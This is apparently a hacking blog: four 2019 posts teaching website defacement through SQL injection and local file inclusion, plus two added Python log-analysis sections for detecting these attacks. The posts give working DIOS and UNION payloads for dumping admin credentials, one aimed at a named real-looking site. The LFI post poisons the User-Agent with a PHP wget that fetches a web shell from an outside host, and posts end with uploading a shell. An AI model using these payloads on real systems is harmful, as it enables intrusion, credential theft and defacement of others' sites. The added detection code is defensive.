Monday, 23 September 2019
How to Deface: SQLi PoC With DIOS
Hi...!
This time I'm sharing some knowledge again..
About how to deface using a manual SQLi PoC...
Let's go straight to the tutorial..
Check it out..
[#] Ingredients [#]
1. Dork (whether it's fresh or not depends on your face :v)
That's it for the dorks for now...
[NB .:: Develop them further yourself!! ::.]
2. Enough data quota (if you don't have any, use Wi-Fi)
3. Patience :v
4. Determination
5. Coffee, cigarettes (to stay relaxed)
6. DIOS
[#] Defacing Step by Step [#]
1. Dork first using the dorks above....
2. Pick a target site that looks vulnerable...
I'm using the site
http://www.sitetarget.co.li/news.php?id=1
3. Check whether it is vulnerable or not..
To do that, add ' to the target..
Example::
http://www.sitetarget.co.li/news.php?id=1
It becomes..
http://www.sitetarget.co.li/news.php?id=1'
If it is vulnerable, the target site changes...
For example :: (Your SQL Syntax blah blah blah, a blank page, something changes...)
4. Continue to the ORDER BY step..
http://www.sitetarget.co.li/news.php?id=1+order+by+1--+-
[NO ERROR]
Let's find the error :v
http://www.sitetarget.co.li/news.php?id=1+order+by+2--+-
[STILL NO ERROR]
http://www.sitetarget.co.li/news.php?id=1+order+by+3--+-
[STILL NO ERROR]
http://www.sitetarget.co.li/news.php?id=1+order+by+4--+-
[STILL NO ERROR]
http://www.sitetarget.co.li/news.php?id=1+order+by+5--+-
[ERROR HERE]
Continue to UNION SELECT (since we now know the number of columns...)
http://www.sitetarget.co.li/news.php?id=1+union+select+1,2,3,4--+-
Now... the magic numbers show up...
3 , 2
We put the DIOS in one of the magic numbers that showed up..
(/*!50000select*/(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(/*!50000select*/(0)from(information_schema.columns)/*!50000where*/(table_schema=database())and(0x00)in(@x:=/*!50000concat*/+(@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x)
It ends up like this...
http://www.sitetarget.co.li/news.php?id=1+union+select+1,2,(/*!50000select*/(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(/*!50000select*/(0)from(information_schema.columns)/*!50000where*/(table_schema=database())and(0x00)in(@x:=/*!50000concat*/+(@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x),4--+-
Next..
We dump the admin username and password
Here's how..
(/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(/*!50000select*/(@x)from(namatabel)where(@x)in(@x:=/*!50000concat*/(0x20,@x,0x3c62723e,namakolom,0x203a3a20,namakolom))))x)
This is how it ends up :v
http://www.sitetarget.co.li/news.php?id=1+union+select+1,2,(/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(/*!50000select*/(@x)from(admin)where(@x)in(@x:=/*!50000concat*/(0x20,@x,0x3c62723e,username,0x203a3a20,password))))x),4--+-
There you go..
The admin username and password show up :D
Next, find the admin login page (adlog)
If there is one..
Just log in with the username and password we got earlier..
Sometimes.. the password has to be cracked first :v (passwords stored using algorithms such as MD5, MD4, MD2, SHA1, Base64 and many others)
Once you have logged in successfully..
Go find an upload form.
Upload your favourite shell there..
Then access the shell you planted on the site...
That's all from me
[#] Mr.Kancil303 [#]
If I said anything wrong
I apologise >_<
[#] Happy Deface :D [#]
Saturday, 21 September 2019
LFI Method Deface Tutorial
This time I'm sharing some knowledge again, guys :v
OK, let's get straight to it :v
1. Ingredients:
* Dork:
(DEVELOP THE REST YOURSELF)
* Coffee (to stay relaxed)
* Tamper Data
Right, straight on to the tutorial:
1. Dork first as usual
2. Pick a site that you think is untouched
3. Got the site? Let's continue
Example: http://site.com/info.php?file=news.php
4. Next, we replace what comes after the = with ../../../
Example: news.php is replaced with ../../../
Example: http://site.com/info.php?file=../../../
5. Then we get an error like the following...
Warning: include(../../../) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99
OK, it looks like we have a chance to make include pull in another file.
6. Next we try to find /etc/passwd.
Example: http://site.com/info.php?file=etc/passwd
But we still get an error like the following:
Warning: include(/etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99
What if we go up more directories? (What if there's no error? If there's no error you get the etc/passwd file right away, but if it still errors, keep going up directories.)
Let's try...
Example: http://site.com/info.php?file=../../../../../../../../../etc/passwd
Ahoy, we managed to get the /etc/passwd file, which looks like the following:
7. Let's check whether we can access /proc/self/environ.
Now replace "/etc/passwd" with "/proc/self/environ"
Example: http://site.com/info.php?file=../../../../../../../../../proc/self/environ
If you get something like this:
DOCUMENT_ROOT=/home/gunslinger/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html,
application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif,
image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=3g4t67261b341231b94r1844ac2ad7ac
HTTP_HOST=www.site.com HTTP_REFERER=http://www.site.com/index.php?view=../../../../../../etc/passwd
HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15
PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665
REQUEST_METHOD= GET REQUEST_URI = /index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/gunslinger/public_html/index.php SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=gunslinger@site.com SERVER_NAME=www.site.com
SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k
PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at www.site.com Port 80
It turns out we can access /proc/self/environ!
If you get an empty (blank) page, /proc/self/environ cannot be accessed, or the server may be running a *BSD operating system.
8. Now let's inject malicious code by poisoning the HTTP headers. How can we inject it? We can use the Tamper Data Firefox add-on.
You can download it via Google.
Open Tamper Data in Firefox, then enter the /proc/self/environ URL from before: "http://site.com/info.php?file=../../../../../../../../../proc/self/environ"
Then in the User-Agent field enter the following code:
<?system('wget http://r57.gen.tr/c100.txt -O shell.php');?>
or
<?exec('wget http://r57.gen.tr/c100.txt -O shell.php');?>
then submit.
9. If we managed to inject the malicious code above, the shell will be at a location like this.
http://www.site.com/shell.php
happy hacking !
[#] Thanks For :: Mr.Bulldog [#]
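What the steps in this LFI post look like from the server side, as an added example that is not part of the original post: Python code that reads combined-format access log lines and tags directory traversal, reads of `etc/passwd` or `proc/self/environ`, and PHP open tags arriving in the User-Agent or Referer header. The tag names, the log layout and the sample lines (documentation IP range, harmless marker in place of a payload) are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Combined log format: client, request target, status, referer, user agent.
LOG = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "\S+ (\S+)[^"]*" (\d{3}) \S+ "([^"]*)" "(.*)"$')
SENSITIVE = ("etc/passwd", "proc/self/environ")

def decode(target, rounds=3):
    """Percent-decode repeatedly so double-encoded ..%252F is seen as ../ too."""
    for _ in range(rounds):
        once = unquote(target)
        if once == target:
            break
        target = once
    return target

def inspect(line):
    """Return (client, tags) for one access log line, or None if it does not parse."""
    m = LOG.match(line)
    if not m:
        return None
    client, target, status, referer, agent = m.groups()
    path, tags = decode(target), set()
    if "../" in path:
        tags.add("traversal")
    tags |= {"reads:" + name for name in SENSITIVE if name in path}
    if "<?" in agent or "<?" in referer:
        tags.add("php-tag-in-header")
    # Header text lands in the process environment, which the include then parses.
    if {"php-tag-in-header", "reads:proc/self/environ"} <= tags:
        tags.add("environ-poisoning")
    if tags and status == "200":
        tags.add("served-200")
    return client, tags

def triage(lines):
    """Keep only the lines that raised at least one tag."""
    return [(c, sorted(t)) for c, t in filter(None, map(inspect, lines)) if t]

# Constructed sample log lines, not real traffic.
_P = '192.0.2.44 - - [21/Sep/2019:10:00:0%d +0000] "GET /info.php?file=%s HTTP/1.1" 200 900 "-" "%s"'
SAMPLE = [
    _P % (1, "news.php", "Mozilla/5.0"),
    _P % (2, "../../../", "Mozilla/5.0"),
    _P % (3, "..%2F..%2F..%2Fetc%2Fpasswd", "Mozilla/5.0"),
    _P % (4, "../../../proc/self/environ", "<?php /* constructed marker */ ?>"),
]

if __name__ == "__main__":
    for client, tags in triage(SAMPLE):
        print(client, tags)
```

A line tagged `environ-poisoning` together with `served-200` means the file parameter reached an include call while header text controlled by the client was present; the durable fix is to map the parameter onto a fixed allow-list of files instead of passing it to `include`.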
Saturday, 07 September 2019
How to Deface: Lokomedia SQL Method
Hello guys ;v
I'm back again :v
_/|Mr.Kancil303
This time I'm going to share some knowledge again :v
Namely how to deface with the Lokomedia SQL method
Let's continue :v
Get the ingredients ready first
~ Dork
~ Data quota
~ Coffee
~ Cigarettes :v
~ Exploit
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
Tutorial ::
1. Dork first using the dorks above, and develop the dorks further to find untouched sites ;v
2. Pick a target site that looks exploitable :v
3. My example target
https://sitetarget.go.id/home/statis-1-profil.html
4. Insert the exploit from above
Example:
https://sitetarget.go.id/home/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html
Like that
If it is vulnerable, the admin username and password will show up
If not, go look for another one
5. Usually when the password shows up it has to be cracked first ;v
But if you're lucky you won't need to crack it
Here is a site for cracking the password
http://hashkiller.co.uk/Cracker/MD5
6. Next....
Find the admin login page
If you find it
Log in with the username and password that showed up earlier
Logged in successfully?
Find an upload form
Upload your shell / deface script
You know what to do next ;v
Find where it is accessible > deface
That's all from me...
If I said anything wrong
Please forgive me >:(
Regards Team :: B.S.C.A EXPLOITER TEAM
Copyright©2K19 _/|MR.KANCIL303
Thursday, 05 September 2019
SQLi Tutorial: Print Name & Image
SQLi Tutorial: Print Name & Image, Version, etc.
Hello guys :"v
I'm back again, the handsome MR-KANCIL-303 :v
This time I'm going to share porn :"v
Er, knowledge :"v
.::::. HOW TO INJECT THE SITE http://www.florencemylove.com .::::.
Enough talk :v let's start the fight :"v
Just kidding :"v
Let's begin :v
Target site .::. http://www.florencemylove.com
There is no parameter or anything like that there :"v
So we have to look for one :"v
How do we look for it?
Here I use a dork
inurl:php?id= site:florencemylove.com
That's the dork
NB: With a dork like that, don't include the https / www part...
Remember that
Dork first using the one above
Pick the page
For example I got
http://www.florencemylove.com/en/page.php?id=3
Let's execute :)
How do we know whether it is vulnerable or not?
Add ' after the parameter, for example
http://www.florencemylove.com/en/page.php?id=3
Then we compare how the page looks before adding ' and after adding '
Let's continue :")
We start checking one by one to find where the error is.
http://www.florencemylove.com/en/page.php?id=3+ORDER+BY+1--[normal]
http://www.florencemylove.com/en/page.php?id=3+ORDER+BY+100--[normal]
Let's try string-based 😙
http://www.florencemylove.com/en/page.php?id=3'+ORDER+BY+1--+-[normal]
http://www.florencemylove.com/en/page.php?id=3'+ORDER+BY+10--+-[normal]
http://www.florencemylove.com/en/page.php?id=3'+ORDER+BY+100--+-[error Cok]
Go back down
http://www.florencemylove.com/en/page.php?id=3'+ORDER+BY+50--+-[ ERROR ]
http://www.florencemylove.com/en/page.php?id=3'+ORDER+BY+47--+-[NORMAL]
http://www.florencemylove.com/en/page.php?id=3'+ORDER+BY+48--+- [ERROR]
So here my error is at 48
Which means there are 47 columns
Let's check UNION SELECT to find the magic numbers ;"v
OK, next we go straight to UNION SELECT
http://www.florencemylove.com/en/page.php?id=3'http://www.florencemylove.com/en/page.php?id=-3'+AND+false+union--+%0aselect+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47-- -
THE NUMBERS SHOW UP
NEXT, WELL, YOU KNOW :"V
PUT YOUR DIOS IN THE NUMBER THAT SHOWS UP
EXAMPLE...
http://www.florencemylove.com/en/page.php?id=-3'+AND+false+union--+%0aselect+1,2,3,4,5,6,7,8,concat/**/**/(0x3C696D67207372633D2268747470733A2F2F692E706F7374696D672E63632F77423954376A4D522F32303139303732352D3130313533382E706E67222077696474683D2233303022203E203C62723E203C666F6E743E203C666F6E7420636F6C6F72203D207265643E494E4A4543544544204259204D522D4B414E43494C2D3330333C2F666F6E743E3C62723E3C62723E5445414D202E3A3A2E20424C41434B20534B554C4C2043594245522041524D593C62723E3C62723E,database(),0x3c62723e,@@hostname,0x3c62723e,@@tmpdir,0x3c62723e,@@datadir,0x3c62723e,@@basedir,0x3c62723e,schema(),0x3c62723e,session_user(),0x3c62723e,UUID(),0x3c62723e,current_user(),0x3c62723e,system_user(),0x3c62723e,@@GLOBAL.have_symlink,0x3c62723e,@@GLOBAL.have_ssl,@@port,0x3c62723e,@@log_error,0x3c62723e,@@socket,0x3c62723e,@@CHARACTER_SETS_DIR,0x3c62723e,@@pid_file,0x3c62723e,@@plugin_dir,0x3c62723e,@@wait_timeout,0x3c62723e,@@myisam_recover_options,0x3c62723e,@@collation_connection,0x3c62723e,@@version_compile_machine,0x3c62723e,@@version_compile_os),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47-- -
OK, that's it for my tutorial
Thank you :")
TEAM .:::. BLACK SKULL CYBER ARMY
Tutor by MR-KANCIL-303🔥
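A defender-side view of the requests in the three SQLi posts on this page (the ORDER BY column counting, the UNION SELECT step, the `/*!50000...*/` wrapping, the `union--+%0aselect` line break and the Lokomedia injection inside a `.html` path), as an added example that is not part of the original posts: Python code that normalizes request targets taken from web logs and tags these patterns per client. The tag names, the `sweep_min` threshold and the sample events are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

VERSIONED = re.compile(r"/\*!\d*(.*?)\*/", re.S)  # MySQL executes the body of /*!50000 ... */
BLOCK = re.compile(r"/\*.*?\*/", re.S)            # a plain /* */ comment acts as whitespace
LINE = re.compile(r"(?:--(?=\s|$)|#)[^\n]*")      # "-- " and "#" comment out the rest of a line
ORDER_BY = re.compile(r"\border by (\d+)")
RULES = {
    "order-by-probe": ORDER_BY,
    "union-select": re.compile(r"\bunion (?:all )?select\b"),
    "schema-enum": re.compile(r"\binformation_schema\b"),
    "uservar-dump": re.compile(r"@\w*:="),
}

def normalize(target):
    """Decode a request target and approximate the SQL text the database parses."""
    s = unquote_plus(target)          # "+" and %xx, in the path as well as the query
    s = VERSIONED.sub(r" \1 ", s)     # keep the keyword hidden inside the comment
    s = BLOCK.sub(" ", s)
    s = LINE.sub(" ", s)              # stops at a newline, so "union-- \nselect" rejoins
    return re.sub(r"\s+", " ", s).lower()

def classify(target):
    text = normalize(target)
    tags = {name for name, rx in RULES.items() if rx.search(text)}
    if "/*!" in unquote_plus(target):
        tags.add("versioned-comment")
    return tags

def summarize(events, sweep_min=3):
    """events: (client, request_target) pairs -> {client: sorted tags} for flagged clients."""
    tags, columns = defaultdict(set), defaultdict(set)
    for client, target in events:
        tags[client] |= classify(target)
        columns[client] |= set(ORDER_BY.findall(normalize(target)))
    for client, seen in columns.items():
        if len(seen) >= sweep_min:    # many distinct ORDER BY N values = column counting
            tags[client].add("order-by-sweep")
    return {c: sorted(t) for c, t in tags.items() if t}

# Constructed sample events (documentation IP ranges), not real log data.
SAMPLE = [("192.0.2.10", f"/news.php?id=1+order+by+{n}--+-") for n in range(1, 6)] + [
    ("192.0.2.10", "/news.php?id=1+/*!50000union*/+/*!50000select*/+1,2,3,4--+-"),
    ("198.51.100.7", "/search.php?q=how+to+order+by+mail"),
    ("198.51.100.7", "/news.php?id=7"),
]

if __name__ == "__main__":
    for client, found in summarize(SAMPLE).items():
        print(client, found)
```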


